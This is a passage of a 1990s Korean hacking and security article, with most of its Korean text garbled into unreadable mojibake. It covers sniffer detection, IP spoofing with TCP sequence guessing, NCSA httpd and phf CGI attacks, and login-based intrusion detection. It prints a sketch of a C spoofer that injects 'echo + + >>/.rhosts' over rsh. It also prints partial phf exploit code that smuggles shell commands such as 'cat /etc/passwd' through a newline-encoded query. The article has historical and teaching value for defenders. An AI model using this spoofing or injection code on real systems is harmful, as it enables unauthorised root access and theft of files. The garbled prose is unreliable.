ÀÖ´Â ÇÁ·Î¼¼½ºÁß¿¡¼ ¼ö»óÇÑ °ÍµéÀ» ã´Â´Ù. ./a.out,
./in.telnetd, in.uucpd µîÀ¸·Î ¼û°ÜÁö´Â°Ô º¸ÅëÀε¥ ¾Ë¾Æ³»±â
¾î·ÆÀÝ´Ù.
# touch /tmp/sniff_trap
# telnet gondor.kaist.ac.kr
SunOS UNIX (gondor)
login: blah
Password:
Login incorrect
login:^D
Connection closed by foreign
host.
# nice -19 find / -newer /tmp/sniff_trap
-print
BSD ps(/usr/ucb/ps)°¡ »ç¿ë °¡´ÉÇÏ´Ù¸é e¿É¼ÇÀ» Ãß°¡Çؼ
ÇÁ·Î¼¼½º°¡ ½ÃÀÛµÆÀ» ¶§ÀÇ È¯°æº¯¼ö¸¦ ¾Ë¾Æ³»¾î ¾î¶² °èÁ¤ÀÌ ÇØÅ·¿¡
»ç¿ëµÆ´ÂÁö¸¦ ¾Ë¾Æ³¾ ¼ö ÀÖ´Ù.
¾î¶»°Ô ¿¹¹æÇØ¾ß Çϳª?
½º´ÏÆÛ¿¡ ´ëºñÇÏ´Â ¹æ¹ýÀÇ ¿øÄ¢Àº Æнº¿öµå°¡ ³×Æ®¿öÅ©¸¦
ÅëÇØ Àü´ÞµÇÁö ¾Ê°Ô ÇÏ´Â °ÍÀÌ´Ù. ±×°ÍÀÇ ±¸ÇöÀº ¾Ïȣȸ¦ ÀÌ¿ëÇϰųª (secure
shell, kerberos) Æнº¿öµå¸¦ ´ë½ÅÇÏ´Â ÅäÅ«À» ÀÌ¿ë(S/key)ÇÏ´Â
°ÍÀ» ¿¹·Î µé ¼ö ÀÖ´Ù. ±×·± ºÎ·ùÀÇ ¼ÒÇÁÆ®¿þ¾îµéÀº »ó
´ç¼ö°¡ Á¦ÀÛµÅÀִµ¥ ±×Áß °ø°³ ¼ÒÇÁÆ®¿þ¾îÀÎ ssh(Secure
Shell: http://www.cs.hut.fi/ssh)ÀÌ »ç¿ëÇϱ⿡
°¡Àå ¹«³ÇÏ´Ù . ÀÌ°ÍÀº ÆÐŶÀ» ¾ÏÈ£ÈÇØ sshd(¼¹ö)¿¡°Ô
º¸³»´Â ssh,scp(Ŭ¶óÀ̾ðÆ®)°¡ telnet, rlogin, ftp¸¦
´ë½ÅÇÏ´Â ÆÐÅ°ÁöÀÌ´Ù.
ÀÌÁ¦ Á»´õ °í¼öÁØÀÇ ÇØÅ· ¹æ¹ýÁßÀÇ ÇϳªÀÎ spoofing¿¡ ´ëÇؼ
¾Ë¾Æº¸µµ·Ï ÇÏÀÚ.
IP ½ºÇªÇÎÀ̶õ?
spoof¶õ ´Ü¾î´Â '¼ÓÀÌ´Ù, »ç±âÄ¡´Ù'´Â ¶æÀÌ´Ù. Áï ½±°Ô
¼³¸íÇϸé ÇØÄ¿°¡ ¸Ó¹°·¯ÀÖ´Â, ¶Ç´Â ´Ü¼øÈ÷ ¾Ç¿ëÇÏ°íÀÚ Çϴ ȣ½ºÆ®ÀÇ IP
¾îµå·¹½º¸¦ ¹Ù²Ù¾î¼ À̸¦ ÅëÇØ ÇØÅ·À» ÇÏ´Â °ÍÀÌ´Ù. °¡·É
A¶õ È£½ºÆ®¿Í B¶õ È£½ºÆ®°¡ Çϵåµð½ºÅ©¸¦ °øÀ¯ÇÏ°í Àִµ¥ A ¶õ È£½º Æ®¿Í B¶õ
È£½ºÆ®´Â º¸¾ÈÀÌ Àß µÇ¾î¼ ÇØÅ·ÇϱⰡ º¸Åë ¾î·Á¿î °ÍÀÌ
¾Æ´Ï¶ó°í ÇÏÀÚ.
ÇÏÁö¸¸ ¾î¶»°Ô¼µçÁö B¶õ È£½ºÆ®¾È¿¡ ÀÖ´Â ÀÏ±Þ ±Øºñ ¹®¼¸¦
ÈÉÃÄ¿À°í ½Í´Ù¸é ¾î¶»°Ô ÇØ¾ß ÇÒ±î? ±×·¸´Ù¸é ÇØÄ¿ÀÇ ÃÖ¼±ÀÇ ¼± Åà ¹æ¹ýÀº
´ÙÀ½°ú °°´Ù. ¿ì¼± ÀÚ½ÅÀÌ ¸Ó¹°·¯ Àִ ȣ½ºÆ®ÀÇ IP ¾îµå·¹½º¸¦
BÀÇ ¾îµå·¹½º·Î À§ÀåÀ» ÇÑ´Ù. À§ÀåÀ» Çϸé B ÀÇ È£
½º Æ®ÀÇ È¸é¿¡´Â
duplicated IP address ¶ó´Â ¹®ÀåÀÌ ÂïÈ÷°Ô µÇ°í BÈ£½ºÆ®´Â
³×Æ®¿öÅ© ±â´ÉÀ» Àá½Ã »ó½ÇÇÏ°Ô µÈ´Ù.
À̶§¸¦ ³õÄ¡Áö ¾Ê°í ÇØÄ¿ÀÇ È£½ºÆ®´Â A È£½ºÆ®¿¡°Ô ÀÚ½ÅÀÌ
ÁøÂ¥ BÈ£½ºÆ®¶ó´Â Á¤º¸¸¦ º¸³»¾î AÈ£½ºÆ®¿Í °°ÀÌ ÇÏµå µð½ºÅ©¸¦ °øÀ¯ Çϵµ·Ï
½ÃµµÇÑ´Ù. ¼º°øÇÏ°Ô µÇ¸é ÇØÄ¿´Â AÈ£½ºÆ®ÀÇ Çϵåµð½ºÅ©¿¡
ÀÖ´Â ±Øºñ ¹®¼¸¦ AÈ£½ºÆ®³ª BÈ£½ºÆ®¿¡ ÀâÀÔÇÏÁö ¾Ê°íµµ ¾ò¾î³¾ ¼ö ÀÖ°Ô µÈ´Ù.
¶ÇÇÑ IP ½ºÇªÇΰú Ç×»ó ¿¬µ¿µÅ »ç¿ëµÇ´Â °ø°Ý¹ýÀ¸·Î TCP
sequence number guessing attackÀ» µé ¼ö ÀÖ´Ù. ÀÌ¿¡
´ëÇؼµµ Àá½Ã ¼³¸íÇغ¼±î ÇÑ´Ù.
TCP Sequence Number Guessing AttackÀ̶õ?
°ú°Å¿¡ Internet wormÀÇ ÀúÀڷεµ À¯¸íÇß´ø Robert T.Morris°¡
º§ ¿¬±¸¼Ò¿¡¼ ÀÎÅϽ±À¸·Î ÀÏÇÒ ¶§ ½è´ø ³í¹®¿¡¼
óÀ½À¸·Î ¾Ë·Á Á³°í AT&T»çÀÇ Bellovin S.MÀÌ 89³â¿¡
¾´ ³í¹®¿¡¼µµ ¾ð±ÞÀÌ µÇ¾ú´ø °ø°Ý ¹æ¹ýÀÌ´Ù(Security
Problems in the TCP/IP Protoc ol Suite).
Äɺó ¹ÌÆ®´ÐÀÌ »ç¿ëÇÑ ¹æ¹ý
¶ÇÇÑ, ÀÌ·± °ø°ÝÀ» ÀÌ¿ëÇØ À۳⵵¿¡ ½ÃÅ¥¸®Æ¼°è¸¦ ¶°µé¼®ÇÏ°Ô
Çß¾ú´ø »ç°ÇÀÌ Çϳª ÀÖ´Ù. ¹Ù·Î Äɺó ¹ÌÆ®´ÐÀÌ ½Ã¸ð¹«¶ó ¾²Å乫( ½´ÆÛÄÄÇ»ÅÍ
¼¾ÅÍ ¼Ò¼Ó ¿¬±¸¿ø)ÀÇ ÄÄÇ»Å͸¦
°ø°ÝÇØ ÀڷḦ »©°£ µÚ °ü¸®ÀÚÀÎ ½Ã¸ð¹«¶ó ¾²Å乫¸¦ Á¶·ÕÇÏ°í
´Þ¾Æ³ »ç°ÇÀÌ´Ù. Äɺó ¹ÌÆ®´ÐÀº »ó´ç±â°£ µ¿¾È
ÀâÈ÷Áö ¾Ê´Ù°¡ ½Ã¸ð¹«¶ó ¾²ÅäÄíÀÇ ´«¹°°Ü¿î ÃßÀû³¡¿¡ °£½ÅÈ÷
ÀâÈù °ÍÀ¸·Î ÀÌ »ç°ÇÀº °á¸»³ª°Ô µÇ¾ú´Ù. Äɺó ¹ÌÆ®´ÐÀÌ Ã¼Æ÷µÇ¾î ÀâÇô°¡¸é¼
½Ã¸ð¹«¶ó¿¡°Ô "´ç½ÅÀÇ ½Ç·ÂÀº Á¤¸» ³î¶ó¿Ô¼Ò."
¶ó°í ¸»ÇØ ´õ À¯¸íÇØÁø »ç°ÇÀ̱⵵ ÇÏ´Ù. ¹Ù·Î ÀÌ »ç°Ç¿¡¼ Äɺó ¹ÌÆ®´ÐÀÌ ¾´ ¹æ¹ýµµ
TCP
Sequence Number guessing attackÀÇ Æ¯º°ÇÑ ÇÑ ÇüŶó°í
ÇÒ ¼ö ÀÖ´Ù . (¹ÌÆ®´ÐÀÌ »ç¿ëÇÑ ¹æ¹ýÀº IP ¾îµå·¹½º¸¦
spoofÇؼ Berkerly R-command(rlogin, rcp , rsh µîµî)¸¦
°ø°ÝÇÑ ¹æ¹ýÀ̾ú´Ù.)
ÀÚ ÀÌÁ¦, IP Spoofing°ú TCP Sequence number guessing
attackÀ» ÀÚ¼¼È÷ ¾Ë¾Æº¸ÀÚ. °£´ÜÈ÷ A¿Í B¶ó´Â
È£½ºÆ®°¡ ¼·Î¸¦ trustÇÏ °í ÀÖ´Ù°í °¡Á¤ÇÏÀÚ. ÀÚ½ÅÀÇ PCÀÇ
IP ¾îµå·¹½º¸¦ B¶ó´Â È£½ºÆ®·Î ¹Ù²Ù°í A¿¡°Ô Á¢±ÙÇÏ¸é °¡´É¼ºÀÌ ÀÖÁö
¾Ê°Ú´À³Ä¶ó°í Àǹ®À» Á¦ ±âÇÏ´Â ºÐÀÌ °è½ÇÁöµµ ¸ð¸£°ÚÀ¸³ª
ÀÚ½ÅÀÇ À§Ä¡°¡ B¶ó´Â È£½ºÆ®°¡ À§Ä¡ÇÑ °÷º¸´Ù Aº¸´Ù ÈξÀ ´õ ½Ã°£ÀûÀ¸·Î À¯¸®ÇÑ
À§Ä¡, Áï LAN ¿¡¼³ª °¡´ÉÇÒ ¹ýÇÑ À̾߱â´Ù. ±×¿ÜÀÇ °æ¿ì¿¡´Â
°ÅÀÇ ¼Ò¿ëÀÌ ¾ø´Ù°í º¸¾Æµµ ¹«¹æÇÏ´Ù..
ÀÚ½ÅÀÇ IP ¾îµå·¹½º¸¦ º¯Á¶Çصµ B¶ó´Â trusted host°¡ A¿¡°Ô·Î
µµ´ÞÇÏ´Â °Å¸®°¡ ¸Ö»Ó¸¸ ¾Æ´Ï¶ó. ÀÚ½ÅÀÇ ¼ºê³Ý¿¡¼ ´Ù¸¥ IP ¾î
µå·¹½º¸¦ °¡Áø ÆÐŶÀ» ³¯¸°´Ù´Â °ÍÀº ¶ó¿ìÆûóÀÇ ¹®Á¦¸¦
ºñ·ÔÇØ °®°¡Áö ¹®Á¦Á¡ÀÌ Á¦±âµÈ´Ù.
±×·³ Äɺó ¹ÌÆ®´ÐÀÌ Berkeley
R-commands¸¦ °ø°ÝÇÏ´Â °æ¿ì¸¦ ¿¹·Î µé¾î¼ IP spoofing ÀÌ ¾î¶»°Ô ÀÛ¿ëÇϳª¿¡ ´ëÇؼ
¾Ë¾Æº¸±â ·Î ÇÏÀÚ. ¿¹¸¦ µé¾î ÇØÄ¿ÀÇ È£½ºÆ®¸¦ evil.comÀ̶ó
ÇÏ°í target.comÀ» °ø°ÝÇϱâ À§Çؼ target.com°ú
good.com°£ÀÇ trusting Re lationshipÀ» ÀÌ¿ëÇÏ°íÀÚ ÇÑ´Ù.
Áï ,
target.com # cat /.rhosts
good.com root
target.com #
°£´ÜÈ÷ evil.comÀÇ IP ¾îµå·¹½º¸¦ good.comÀÇ IP ¾îµå·¹½º·Î
¹Ù²Û ´ÙÀ½¿¡target.comÀÇ rsh server¿¡
Á¢¼ÓÇÏ·Á°í ½ÃµµÇß´Ù ÇÏÀÚ. ÀÌ °æ¿ì¿¡´Â TCP°¡ °®°í ÀÖ´Â
Initial 3-way ÇÚµå¼ÎÀÌÅ· ¶§¹®¿¡ Ä¿³Ø¼ÇÀÌ ÀÌ·ïÁöÁö ¾Ê´Â´Ù. TCPÀÇ
Initial 3-way ÇÚµå¼ÎÀÌÅ· ÀÇ ¿¹¸¦ ¿ì¼± µé¾îº¸ÀÚ.
evil.com# telnet target.com login ÇÒ °æ¿ì
evil.com -> target.com SYN
1415531521
// evil.comÀÌ
Initial sequence number ¸¦ º¸³½´Ù.
target.com -> evil.com ACK
1415531521 SYN 1823083
521
// target.comÀÌ
evil.comÀÌ º¸³½ ISNÀ» ACKÇÏ°í target.comÀÌ ÀÚ½ÅÀÇ
// Initial
sequence number ¸¦ º¸³½´Ù.
evil.com -> target.com ACK
1823083521
// evil.comÀÌ
target.comÀÇ ISNÀ» ACKÇÑ´Ù.
À§¿Í °°Àº ÆÐŶÀÌ ±³È¯µÈ´Ù. TCP Çì´õÀÇ SYN Ç÷¡±×´Â 'synchronize
sequence numbers'ÀÌ´Ù. SYN Ç÷¡±×´Â
TCP Sequence Number ¸¦ µ¿¹ÝÇϴµ¥ ÀÌ ³Ñ¹ö´Â TCP/IP implementation¸¶´Ù
»ý¼ºµÇ´Â ¹æ¹ýÀÌ ¾à°£¾¿ ´Ù¸£´Ù.
4.4BSD¿¡¼´Â OS°¡ Ãʱâ鵃 ¶§ 1·Î Ãʱâ ÈµÇ°í ±× ÈÄ´Â
0.5Ãʸ¶´Ù 64,000¾¿ Áõ°¡ÇÑ´Ù. ¶ÇÇÑ »õ·Î¿î TCP Ä¿³Ø¼ÇÀÌ
¸¸µé¾îÁú ¶§¸¶´Ù 64,000¾¿ Áõ°¡ÇÑ´Ù.
´Ü¼øÈ÷ evil.comÀÇ IP ¾îµå·¹½º¸¦ ¹Ù²Ù´Â °Í¸¸À¸·Î´Â target.comÀÌ
evil.comÇÑÅ× º¸³»´Â ISNÀ» ¹ÞÀ» ¼ö°¡
¾ø°í(¿Ö³Ä¸é target.c omÀº good.com¿¡°Ô ISNÀ» º¸³»°ÚÁö¿ä.¶ó¿ìÆÃÀÌ
±×·¸°Ô µÇ¾î ÀÖÀ» Å״ϱî.) µû¶ó¼ Ä¿³Ø¼ÇÀÌ ¼º¸³µÇÁö
¾Ê´Â´Ù. Ä¿³Ø¼ÇÀÌ establis hµÉ·Á¸é good.comÀÌ target.comÀÌ
º¸³»´Â ISNÀÌ º¸³»´Â ÆÐŶ¿¡ ÀÀ´äÀ» ÇÏÁö ¸»¾Æ¾ßÇÒ
»Ó¸¸ ¾Æ´Ï¶ó(º¸ÅëÀÇ
°æ¿ì good.comÀº ÀÌ ·² °æ¿ì RST(Reset connection) ÆÐŶÀ»
º¸³»¼ ¸ðµç °ÍÀ» ¸ÁÄ£´Ù)
target.comÀÌ good.com¿¡°Ô º¸³½ ISNÀ» ÃßÃøÇؼ ACKÇØÁà¾ß
ÇÑ´Ù. ÀÌ µÎ ½ºÅÜÀÌ ¿Ïº®ÇÏ°Ô µÆÀ» °æ¿ì echo '+ +'
> /.rhosts À» ´ãÀº rsh ÆÐŶÀ» º¸³» ¿øÇÏ´Â ¸ñÀûÀ»
ÀÌ·ê ¼ö°¡ ÀÖ´Ù.
IP spooferÀÇ ´ë·«ÀûÀÎ ÄÚµå
hose_conn(trust_host, trust_addr,
seq_num, port_num)
{
...
/* sendtcppacket(
struct
ether_addr source_hardware addr.
struct
ehter_addr dest_hardware addr.
u_long
source ip addr.
u_long
dest ip addr.
u_short
source port.
u_short
dest port.
u_long
sequence no.
u_long
acknowledge no.
int
flags (SYN, RST, ACK, PUSH, FIN)
char * data
int
strlen(data)
*/
sendtcppacket(&(eh.ether_shost),
&(eh.ether_dhost), bad_addr,
trust_addr,
port_num[i], 513, seq_num, 0, TM_SYN, NULL, 0);
...
}
det_seq(targ_host, targ_addr,
next_seq, offset)
{
...
/
Ä¿³Ø¼ÇÀ» ¿ä±¸ÇÏ´Â ÆÐŶÀÇ Àü¼Û /
sendtcppacket(&(eh.ether_shost),
&(eh.ether_dhost), my_addr,
targ_addr,
start_port, 514, start_seq, 0, TM_SYN, NULL, 0);
/* readpacket(
struct
fddi_header fddi_header
struct
ether_header ether_header
struct
ip ip_header
struct udphdr udp_header
struct
tcphdr tcp_header
char
* data
int
strlen(data) )
*/
while(readpacket(NULL,
&eh2, &iph, NULL, &tcph, NULL, NULL) !=
PTYPE_IP_TCP)
;
if(ntohs(tcph.th_dport)==start_port
&&
ntohs(tcph.th_sport)==514)
{
/
Æ÷Æ®¹øÈ£°¡ ¸Â´Ù¸é reply ÆÐŶÀ¸·Î °£ÁÖÇÏ°í guessingÀ» ½ÃÀÛÇÑ´Ù /
if(prev_seq)
diff=tcph.th_seq-prev_seq;
else
diff=0;
if(*offset==0)
*offset=diff;
prev_seq=tcph.th_seq;
sendtcppacket(&(eh.ether_shost),
&(eh_ether_dhost), my_addr,
targ_addr,
start_port+
+, 514, start_seq++, 0, TM_RST, NULL, 0);
...
}
spoof_conn(trust_addr, targ_host,
targ_addr, next_seq)
{
char
*string="0\0root\0root\0echo + + >>/.rhosts\0";
/
SYN ÆÐŶÀ» °íÀ¯ÇÑ ½ÃÄö½º¹øÈ£¿¡ ¸ÂÃç Àü¼Û /
sendtcppacket(&(eh.ether_shost),
&(eh.ether_dhost), trust_addr,
targ_addr,
port, 514, seq++, 0, TM_SYN, NULL, 0);
usleep(5000);
/
guessÇÑ ½ÃÄö½º¹øÈ£¿¡ ¸ÂÃç ACK ÆÐŶÀ» Àü¼Û /
sendtcppacket(&(eh.ether_shost),
&(eh.ether_dhost), trust_addr,
targ_addr,
port, 514, seq, ++next_s
eq, TM_ACK, NULL, 0);
/
rsh request¸¦ ½ÃÄö½º¹øÈ£¿Í ACK¹øÈ£¿¡ ¸ÂÃß¾î Àü¼Û /
sendtcppacket(&(eh.ether_shost),
&(eh.ether_dhost), trust_addr,
targ_addr,
port, 514, seq, next_seq, TM_ACK, string, stringlen);
seq+=stringlen;
/
Àü¼ÛÇÑ ÆÐŶÀÌ ACKµÇ¾î 󸮵DZ⸦ ±â´Ù¸°´Ù /
sleep(1);
/
»õ·Î¿î ½ÃÄö½º¹øÈ£¿¡ ¸ÂÃß¾î FINÆÐŶÀ» Àü¼Û /
sendtcppacket(&(eh.ether_shost),
&(eh.ether_dhost), trust_addr,
targ_addr,
port, 514, seq, next_seq, TM_FIN, NULL, 0);
/
RSTÆÐŶ Àü¼Û, Ä¿³Ø¼Ç Æıâ./
sendtcppacket(&(eh.ether_shost),
&(eh.ether_dhost), trust_addr,
targ_addr,
port, 514, seq+4, next_seq+4, TM_RST, NULL, 0);
...
}
main(argc, argv)
{
/*
initialization of the packet */
init_filter("tcp",
NULL);
/*
trusted hostÀÇ 513¹ø Æ÷Æ®¿¡ ´ëÇØ flooding ½ÃÀÛ */
hose_trusted(argv[1],
trust_addr, seq_num, port_num);
/*
guessing Sequence Number */
det_seq(argv[2],
targ_addr, &next_seq, &offset);
/*
½ÇÁ¦ spoofingÇÑ Ä¿³Ø¼ÇÀ» ½ÃÀÛ. À̶§¿¡´Â ´ÙÀ½ ½ÃÄö½º¹øÈ£¸¦ ¾Ë°íÀÖ´Ù */
spoof_conn(trust_addr,
argv[2], targ_addr, next_s
eq);
/*
¸ðµç Ä¿³Ø¼ÇÀ» reset. */
reset_trusted(argv[1],
trust_addr, seq_num, port_num);
exit(0);
}
* IP spoofing ¿¡ ´ëÇؼ´Â ´ÙÀ½ÀÇ Á¤º¸¸¦ ÂüÁ¶ÇÏÀÚ.
ftp://ftp.research.att.com/dist/internet_security
Bellovin
paper : ipext.ps.Z
->
"Security Problems in the TCP/IP Protocol Suite"
Morris
paper : 117.ps.Z
->
"A Weakness in the 4.2BSD Unix TCP/IP Software"
CERT_advisory
CA-95:01.IP.spoofing
³Ý½ºÄÉÀÌ
ÇÁ¸¦ ÀÌ¿ëÇÑ ÇØÅ·
¸¶Áö¸·À¸·Î ÃÖ±Ù ¸¹Àº Àα⸦ ¾ò°í ÀÖ´Â ³Ý½ºÄÉÀÌÇÁ¸¦ ÀÌ¿ëÇØ
ÇØÅ·ÇÏ´Â ±â¹ý¿¡ ´ëÇØ »ìÆ캸ÀÚ.
NCSA HTTPD¸¦ ÀÌ¿ëÇÑ ÇØÅ·
ÂüÁ¶: CERT Advisory CA-95:04
CIAC Advisory F-11: UNIX NCSA httpd Vulnerability
NCSA HTTPD¸¦ µ¹¸®´Â È£½ºÆ®ÀÇ °ü¸®ÀÚµéÀº ¼Ò½º¿¡ CERT
Advisory CA-95:04¿¡¼ Á¦½ÃÇÑ ÆÐÄ¡¸¦ Àû¿ëÇÑ ÈÄ µ¹·ÁÁÖ±â
¹Ù¶õ´Ù. httpd ÇÁ·Î¼¼½º°¡ ÀÛµ¿ÇÏ´Â µ¿¾È ¿ÜºÎÀÇ ÇØÄ¿°¡
¾Æ¹«·± ÀÎÁõÀýÂ÷¾øÀÌ NCSA httpd°¡ ÀÓÀÇÀÇ ¸í·É¾î¸¦ ¼öÇàÇϵµ·Ï ÇÒ ¼ö
ÀÖ´Ù. ºñ·Ï machine instruction levelÀÌ¾î¼ °ø°Ý´çÇϱâ
±×¸® ½¬¿î ¹ö±×´Â ¾Æ´ÏÁö¸¸ ÁÖÀÇ°¡ ¿ä±¸µÇ´Â ¹ÙÀÌ´Ù. ÇöÀç
NCSA¿¡¼´Â ÀÌ È¦À» ÆÐÄ¡ÇÑ ¼Ò½º¿Í ¹ÙÀ̳ʸ® ¹öÀü 1.3RÀ»
³»³õ°í ÀÖ´Ù.
¶ÇÇÑ NCSAÀÇ cgi-binÀÇ ¿¹Á¦·Î µû¶ó¿À´Â ÇÁ·Î±×·¥Áß phf¶ó´Â
ÇÁ·Î±×·¥ÀÌ ÀÖ´Ù.ÀÌ ÇÁ·Î±×·¥ÀÇ ¹®Á¦´Â popen(3S)ÀÌ »õ·Î¿î
¶óÀÎÀÌ µé¾î¿Ã °æ¿ì »õ·Î¿î command ·Î ÀνÄÇϱ⠶§¹®¿¡
¹®Á¦°¡ ¹ß»ýÇÑ´Ù.
cgi-bin ÇÁ·Î±×·¥ÀÌ popenÀ» »ç¿ëÇÒ °æ¿ì ´ÙÀ½°ú °°Àº ·ùÀÇ
ÇÁ·Î±×·¥À» ÀÌ¿ëÇØ ½±°Ô exploitµÉ ¼ö ÀÖ´Ù. ¾Æ·¡ÀÇ ÄÚµå´Â
±âº»Àû À¸·Î NCSA¿¡ µþ·Á¿À´Â /cgi-bin/phf ¸¦ ÀÌ¿ëÇÏ°í
ÀÖ´Ù. ¾ð·ÐÀÇ ¼º°Ý»ó ÀüºÎ¸¦ ½ÆÁö´Â ¾Ê°í ÁÖ¿äÇÑ ºÎºÐ
¸¸À» ½Æ´Â °ÍÀ»
¾çÇØÇØ Áֱ⠹ٶõ´Ù.
/*
Usage : get hostname 'command
you wanna execute'
EX : get targethost 'cat /etc/passwd'
*/
/* ÁÖ¿ä ÇÔ¼ö ¸î°¡Áö¸¸À» Àû¾ú´Ù.
*/
int writen( fd , buf, nbytes
)
register int fd ;
register char *buf ;
register int nbytes ;
{
int
nleft , nwritten ;
nleft
= nbytes ;
while(
nleft > 0 ) {
nwritten
= write( fd , buf , nleft );
if(
nwritten <= 0 ) return(nwritten);
nleft
-= nwritten ;
buf
+= nwritten ;
}
return(
nbytes - nleft );
}
void make_cmd( char *cmd ,char
*cmdinput)
{
char
*tok;
char
buf[100];
char
*before = "GET /cgi-bin/phf?Jserver=life.sucks&Qalias=";
char
*behind =
"&Qname=&Qemail=&nickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip=\
n";
bzero(buf,sizeof(buf));
strcat(buf,"%0A");
tok
= strtok(cmdinput," ");
strcat(buf,tok);
strcat(buf,"%20");
while(
(tok=strtok(NULL," ")) != NULL ){
strcat(buf,tok);
strcat(buf,"%20");
}
strcat(cmd,before);
strcat(cmd,buf);
strcat(cmd,behind);
}
ÇØÅ·°èÀÇ Çö½Ç
ÇØÅ·Àº ¾È ÁÁÀº ÀνÄÀ̶ó´Â °ÍÀÌ ´ëºÎºÐÀÇ Áß·ÐÀÌ´Ù. ÇÏÁö¸¸
½Ã½ºÅÛ °ü¸®ÀÚµéÀÇ ´ëºÎºÐÀÇ °æÇèÀ» µé¾îº¸°Å³ª, ±×µéÀÇ ÀÇ°ßÀ» µé ¾îº¸¸é ÇØÅ·Àº
ÇÊ¿ä¾ÇÀ̶ó´Â ÀνÄÀ» ¸¹ÀÌ ÇÏ°í ÀÖ´Ù. ¸ÖƼÀ¯ÀúµéÀ» À§ÇÑ
½Ã½ºÅÛÀÌ¾î¼ º¸¾È»ó ¿Ïº®ÇÒ ¼ö ¾ø´Ù´Â °ÍÀÌ ¼öÇÐÀûÀ¸·Î Áõ¸íµÈ »óÅÂÀ̹ǷÎ, º¸¾È¿¡
¿Ïº®Àº ±âÇÏÁö ¸øÇÏ´õ¶óµµ ÃÖ¼±À» ±âÇϱâ À§Çؼ´Â ¾î´À
Á¤µµ ÇØÅ·¿¡ ´ëÇÑ Áö½ÄÀÌ ÀÖ¾î¾ß ÇÑ´Ù.
¶ÇÇÑ ½Ã½ºÅÛÀÇ ¹ö±×¸¦ ¹ß°ßÇؼ ¹ö±× ¸®Æ÷Æ®¸¦ ¹ßÇ¥ÇÑ ´ë´Ù¼öµéÀº
¸ðµÎ ÇÑ ¶§ ½Ã½ºÅÛ Ä§ÀÔÀڷμÀÇ °æ·ÂÀ» °¡Á³´ø »ç¶÷µéÀÌ ´ë ºÎºÐÀ̶ó´Â °ÍÀÌ
À̸¦ ¹ÝÁõÇØÁشٰí ÇÒ ¼ö ÀÖ°Ú´Ù. ÇöÀç Å×Å©´ÐÀÌ ¶Ù¾î³
ÇØÄ¿µéÀº ´ëÇлýµéÀÌ ´ëºÎºÐÀε¥, À̵éÀº ÀڽŵéÀÇ º¸ ¾È¿¡ ´ëÇÑ Áö½ÄÀ»
ÀÎÁ¤ÇØÁÖ¾úÀ¸¸é ÇÏ´Â ¹Ù·¥À» °®°í ÀÖ´Ù.
ÇØÄ¿ ÃßÀûÇϱâ(Intrusion detection)
¾ðÁ¦±îÁö ÇØÄ¿¿¡°Ô ´çÇÏ°í¸¸ ÀÖÀ»°ÍÀΰ¡? ÇØÄ¿°¡ µé¾î¿Ô´Ù¸é
ÃßÀûÀ» Çؼ Àâ¾Æ³»´Â ÀÏ ¶ÇÇÑ Áß¿äÇÏ´Ù°í ÇÒ ¼ö ÀÖ´Ù. ÀÌÁ¦ ÇØÄ¿¸¦ ÃßÀûÇÏ´Â
¹æ¹ý¿¡ ´ëÇØ ¾Ë¾Æº¸±â·Î ÇÏÀÚ. óÀ½ ½Ã½ºÅÛ¿¡ ·Î±×ÀÎÇÏ°Ô
µÇ¸é ´ÙÀ½°ú °°Àº ¸Þ½ÃÁö¸¦ º¸³¾ °ÍÀÌ´Ù.
login: sakai
password:
Last login: Fri Mar 3 02:05:42
on console
SunOS Release 4.1.3-KLE1.1.3
(BARAM_KOR) #2: Sun Sep 26 10:16:21 KST
1993
You have mail.
1995³â03¿ù03ÀÏ(±Ý) 03½Ã10ºÐ34ÃÊ
KST
%
¿©±â¿¡ ³ªÅ¸³ª´Â Last loginÀ» È®ÀÎÇÏ°í ÀÚ½ÅÀÌ ·Î±×ÀÎÇÑ
½Ã°£´ë°¡ ¾Æ´Ñ¶§¿¡ ·Î±×ÀÎÀÌ µÆ´Â°¡¸¦ È®ÀÎÇØ º»´Ù. ħÀÔÀÚ°¡ µé¾î¿Â °Í °°Àº
ÀǽÉÀÌ µé ¶§ °ü¸®ÀÚ¿¡°Ô ¿¬¶ôÇØ ±× ½Ã°£´ëÀÇ ·Î±×¿Í ÇÁ·Î¼¼½º¸¦
È®ÀÎÇØ ÃßÀûÀ» Çϵµ·Ï ÇÑ´Ù. ȤÀº À§¿Í °°ÀÌ ÀÚ½ÅÀÇ ½Ã ½ºÅÛ ·Î±×ÀÎ
¸Þ½ÃÁö¸¦ È®ÀÎÇÏ´Â ¹æ¹ýµµ ÀÖÁö¸¸, ´Ù¸¥ ¹æ¹ýÀ¸·Î, last¶ó´Â
¸í·ÉÀ» ÀÌ¿ë, ÀÚ½ÅÀÇ ½Ã½ºÅÛ¿¡ ÀÚ½ÅÀÇ À̸§À¸·Î µé¾î¿Â À¯Àú¸¦ ãÀ» ¼öµµ
ÀÖ´Ù. ´ÙÀ½Àº lastÀÇ ¿¹ÀÌ´Ù.
% last | more
ksh ttyqd casaturn.kaist.a Thu
Mar 16 16:52 still logged in
chkim ttyr9 dal1.kaist.ac.kr
Thu Mar 16 16:50 still logged
in
hjha ttyqd danso.kaist.ac.k
Thu Mar 16 16:49 - 16:51 (00:01)
hjha ttyra danso.kaist.ac.k
Thu Mar 16 16:47 - 16:47 (00:00)
solee ttyra dangun.kaist.ac.
Thu Mar 16 16:46 - 16:46 (00:00)
yjkim ttyr9 gaea.kaist.ac.kr
Thu Mar 16 16:44 - 16:50 (00:05)
chkim ttyr9 dal1.kaist.ac.kr
Thu Mar 16 16:42 - 16:43 (00:01)
drunken ttyra chagall.kaist.ac
Thu Mar 16 16:40 - 16:40 (00:00)
shhong ttyra dbserver.kaist.a
Thu Mar 16 16:39 - 16:39 (00:00)
jhlee ttyr9 paradise.kaist.a
Thu Mar 16 16:38 - 16:39 (00:01)
hjha ttyra danso.kaist.ac.k
Thu Mar 16 16:36 - 16:37 (00:00)
À§ÀÇ ¿¹¿¡¼, last | grep myloginnameÀ» ÀÔ·ÂÇϸé, ÀÚ½ÅÀÇ
ID·Î ¾ðÁ¦ ¾îµð¼, ´©°¡ ·Î±×ÀÎÇß´ÂÁö¸¦ ¾Ë ¼ö ÀÖ°Ô µÈ´Ù.
¼÷·ÃµÈ ÇØÄ¿´Â À§ÀÇ last Á¤º¸°¡ À¯ÁöµÈ ½Ã½ºÅÛ ÆÄÀÏÀ»
Áö¿ì°í °¡Áö¸¸, ¿©±â¼´Â ºñ¼÷·Ã ÇØÄ¿¸¦ °¡Á¤ÇÏ°í ¸í·ÉÀ» Ãĺ¼ ¼ö ÀÖ´Ù. ¶Ç´Â ¾à
°£Àº
